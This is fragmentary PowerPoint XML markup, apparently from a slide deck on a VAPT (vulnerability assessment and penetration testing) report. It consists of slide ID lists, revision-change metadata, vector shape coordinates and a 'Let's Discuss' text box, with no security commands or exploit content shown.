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37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7" r:id="rId2"/>
    <p:sldId id="336" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="335" r:id="rId9"/>
    <p:sldId id="268" r:id="rId10"/>
    <p:sldId id="269" r:id="rId11"/>
    <p:sldId id="334" r:id="rId12"/>
    <p:sldId id="300" r:id="rId13"/>
    <p:sldId id="302" r:id="rId14"/>
    <p:sldId id="299" r:id="rId15"/>
    <p:sldId id="297" r:id="rId16"/>
    <p:sldId id="301" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="279" r:id="rId20"/>
    <p:sldId id="280" r:id="rId21"/>
    <p:sldId id="281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282" r:id="rId31"/>
    <p:sldId id="283" r:id="rId32"/>
    <p:sldId id="311" r:id="rId33"/>
    <p:sldId id="285" r:id="rId34"/>
    <p:sldId id="313" r:id="rId35"/>
    <p:sldId id="314" r:id="rId36"/>
    <p:sldId id="315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16" r:id="rId47"/>
    <p:sldId id="290" r:id="rId48"/>
    <p:sldId id="326" r:id="rId49"/>
    <p:sldId id="330" r:id="rId50"/>
    <p:sldId id="295" r:id="rId5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41866-269E-49AC-9DA9-6ED2C2AB431E}" v="1007" dt="2024-12-08T10:55:21.32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946" y="14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patro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld">
      <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T11:21:40.068" v="1077" actId="313"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp mod addAnim delAnim modAnim">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T11:21:40.068" v="1077" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T11:21:40.068" v="1077" actId="313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poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:31:24.791" v="1008" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="257"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:00:44.139" v="788" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="261"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:01:13.181" v="789" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="264"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:18:18.899" v="845" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="267"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp modAnim">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T07:57:40.685" v="13"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T07:57:40.685" v="13"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="278"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modAnim">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:48:59.888" v="1067" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="280"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:48:54.518" v="1066" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="280"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:48:59.888" v="1067" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="280"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modAnim">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:09:23.023" v="819" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="290"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:09:23.023" v="819" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="290"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T07:58:08.051" v="16" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="291"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:44:04.983" v="1026" actId="732"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="571622006" sldId="297"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod modCrop">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:44:04.983" v="1026" actId="732"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="571622006" sldId="297"/>
            <ac:picMk id="7" creationId="{B60840D6-97E0-150C-4769-3CCB4924BDAB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:42:10.124" v="1024" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1806855379" sldId="300"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:42:10.124" v="1024" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1806855379" sldId="300"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:50:35.479" v="1068" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3670057057" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:50:35.479" v="1068" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3670057057" sldId="304"/>
            <ac:spMk id="5" creationId="{5F9C4E36-6B38-3CB1-8677-5960D682F547}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modAnim">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:55:21.328" v="1076" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="957570376" sldId="306"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:55:21.328" v="1076" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="957570376" sldId="306"/>
            <ac:spMk id="7" creationId="{4C4BFF3B-36D8-BC45-FDEE-9B26ADFD92B5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp modAnim">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T09:39:19.887" v="784" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="796977838" sldId="318"/>
        </pc:sldMkLst>
        <pc:spChg chg="add">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T09:36:19.467" v="643"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="796977838" sldId="318"/>
            <ac:spMk id="3" creationId="{A5B438A7-2E5C-62EE-8E3E-DB47A4593441}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T09:36:28.692" v="646"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="796977838" sldId="318"/>
            <ac:spMk id="4" creationId="{69EC9E7B-7B14-87B4-4C11-071DFFE4F037}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T09:39:19.887" v="784" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="796977838" sldId="318"/>
            <ac:spMk id="5" creationId="{B9CE70FA-F38C-83B8-3468-50F5E5518DEF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modAnim">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T09:54:28.803" v="787" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3501750903" sldId="320"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T09:54:28.803" v="787" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3501750903" sldId="320"/>
            <ac:spMk id="4" creationId="{81BEF744-780E-5669-D415-4BFA43C72E28}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modAnim">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:10:55.740" v="844" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3608407148" sldId="326"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:10:55.740" v="844" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3608407148" sldId="326"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T07:58:02.487" v="15" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2935440745" sldId="327"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T07:57:57.453" v="14" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2708200336" sldId="328"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T07:58:52.397" v="17" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2440241363" sldId="329"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp del modAnim">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T09:33:01.169" v="573" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3164744135" sldId="331"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T09:15:47.087" v="182" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3164744135" sldId="331"/>
            <ac:spMk id="4" creationId="{6F4F53B1-FE51-2CFF-CBAC-CBE069F4BE06}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:01:19.912" v="790" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="409652114" sldId="332"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:02:44.358" v="796" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1405236665" sldId="333"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:02:36.894" v="795" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="602459458" sldId="335"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:02:13.200" v="792" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="602459458" sldId="335"/>
            <ac:picMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:02:36.894" v="795" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="602459458" sldId="335"/>
            <ac:picMk id="4" creationId="{CD0D8FB0-9210-EB14-ACD0-0C3C7ABC3EA5}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{80D41866-269E-49AC-9DA9-6ED2C2AB431E}" dt="2024-12-08T10:28:25.868" v="846" actId="2890"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1415416042" sldId="336"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{88B724AE-C884-4C81-9144-72741730187E}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{88B724AE-C884-4C81-9144-72741730187E}" dt="2024-10-21T07:32:46.336" v="3" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{88B724AE-C884-4C81-9144-72741730187E}" dt="2024-10-21T07:32:46.336" v="3" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="poojapatro16@outlook.com" userId="d7096c0e2ed11a4d" providerId="LiveId" clId="{88B724AE-C884-4C81-9144-72741730187E}" dt="2024-10-21T07:32:46.336" v="3" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="258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D092D3-9CC8-4732-99BB-7A589A11440B}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>09-12-2024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163AB-F122-46E8-998A-CFE815F10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299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163AB-F122-46E8-998A-CFE815F10E6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36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18BFB-3356-B819-336B-F4DE458D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78C705-6614-695E-892E-D8A0131AF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CD904-9E35-964C-53D5-C433646FC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39D27-0412-F0D5-CDC1-B76B1E537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163AB-F122-46E8-998A-CFE815F10E6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109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163AB-F122-46E8-998A-CFE815F10E64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417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01518"/>
            <a:ext cx="2633344" cy="264197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229995" cy="887730"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1229995" h="887730">
                <a:moveTo>
                  <a:pt x="1229806" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="885706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6493" y="886205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28958" y="887222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50628" y="887729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61314" y="887729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101920" y="886333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139903" y="882776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183921" y="875284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192278" y="873505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231914" y="862711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275399" y="846201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314706" y="826388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="350367" y="803783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="383070" y="778637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388239" y="774319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413219" y="751713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418071" y="747140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446023" y="718565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="481215" y="679196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506742" y="649097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540816" y="609600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="566940" y="580898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="594182" y="553338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598906" y="549021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="603618" y="544576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613283" y="535939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618210" y="531876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623163" y="527685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="633247" y="519557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643559" y="511683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648931" y="507873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="654304" y="504189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="659676" y="500379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665162" y="496824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670864" y="493395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="676465" y="489838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="688086" y="483235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="694118" y="480187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700138" y="477012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="712419" y="471170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718794" y="468249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="738200" y="460248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764197" y="449072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="815835" y="425069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854202" y="405764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891959" y="385063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928839" y="363220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964641" y="339851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="999375" y="315087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032560" y="289178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1064107" y="261620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089050" y="237616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1093889" y="232790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1121575" y="202311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1151026" y="164846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1154874" y="159385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1158849" y="153797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162596" y="148209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1166355" y="142494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1169974" y="136905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1173505" y="131063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1177023" y="125349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183855" y="113664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1187043" y="107696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1190231" y="101853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1193317" y="95758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196390" y="89788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199362" y="83692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1202232" y="77597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1204963" y="71374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1207731" y="65150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1210246" y="58800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1212773" y="52577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1215301" y="46100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1228001" y="6985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1229806" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF7E49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4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5965" y="853516"/>
            <a:ext cx="7247890" cy="2709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Pooja\OneDrive\Desktop\Pooja_Final_VAPT_Report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21150" cy="5143500"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="412115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121150" cy="5143500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4121150" h="5143500">
                  <a:moveTo>
                    <a:pt x="412076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120769" y="5143500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4120769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724" y="998791"/>
              <a:ext cx="3349371" cy="314591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419474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="110617" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4056379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Let’s Discuss</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4362069" y="856614"/>
            <a:ext cx="425831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l">
